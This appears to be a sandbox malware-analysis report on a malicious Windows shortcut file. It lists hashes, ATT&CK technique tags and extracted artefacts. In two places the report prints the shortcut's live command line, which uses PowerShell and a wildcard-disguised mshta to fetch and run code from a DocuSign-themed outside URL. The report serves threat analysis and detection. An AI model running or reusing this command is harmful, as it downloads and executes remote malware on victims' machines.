Malicious
3a674098d9b45f97f60189e26585ef4b
LNK File | MD5: 3a674098d9b45f97f60189e26585ef4b | Size: 2.03 KB | application/x-ms-shortcut
LNK File
MD5: 3a674098d9b45f97f60189e26585ef4b
Size: 2.03 KB
application/x-ms-shortcut
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 3a674098d9b45f97f60189e26585ef4b
|
| Sha1 | 7530b5d7673dad201cc4a2ee29f4249f6937e458
|
| Sha256 | d8f868ad775e25f9396b788d86ad7cbbbc2f75dd8ef76d7cb9bd2d7be08142bc
|
| Sha384 | 00d085d116b1400a0234f7d97baa96b9c55ff9ba8854a875d0b988bcf517c839b72981406747c26496311071727ef1f4
|
| Sha512 | a5c1e54450810c2a8bb2b4cdbe9c228ee72c92275f707f6c35073c197b1dd67bf4c896f922b40f82a8631344af2732edb2db57b18251c9c9da7f7de4872d238d
|
| SSDeep | 24:8Ayw/BHYVKVWO+/CWx3J8mmipUFxMdd79dsrab/yol+s:8y5aN3vmipRdJ9Aau4
|
| TLSH | BC416A141BE60718F3F3CB756CB6A310897BBC46DD118F8D018142882431615F4B9F6B
|
File Structure
3a674098d9b45f97f60189e26585ef4b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe start powershell -ArgumentList '. (dir C:\W*\S*2\m*ta.*e) https://lunazinvest.com/dash/docusign' |
| Deobfuscated PowerShell | -argumentlist ". (dir C:\W*\S*2\m*ta.*e) https://lunazinvest.com/dash/docusign" |
3a674098d9b45f97f60189e26585ef4b (2.03 KB)
File Structure
3a674098d9b45f97f60189e26585ef4b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe start powershell -ArgumentList '. (dir C:\W*\S*2\m*ta.*e) https://lunazinvest.com/dash/docusign' Malicious |
3a674098d9b45f97f60189e26585ef4b |
| Deobfuscated PowerShell | -argumentlist ". (dir C:\W*\S*2\m*ta.*e) https://lunazinvest.com/dash/docusign" Malicious |
3a674098d9b45f97f60189e26585ef4b > LNK CommandLine > [PowerShell Command] |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.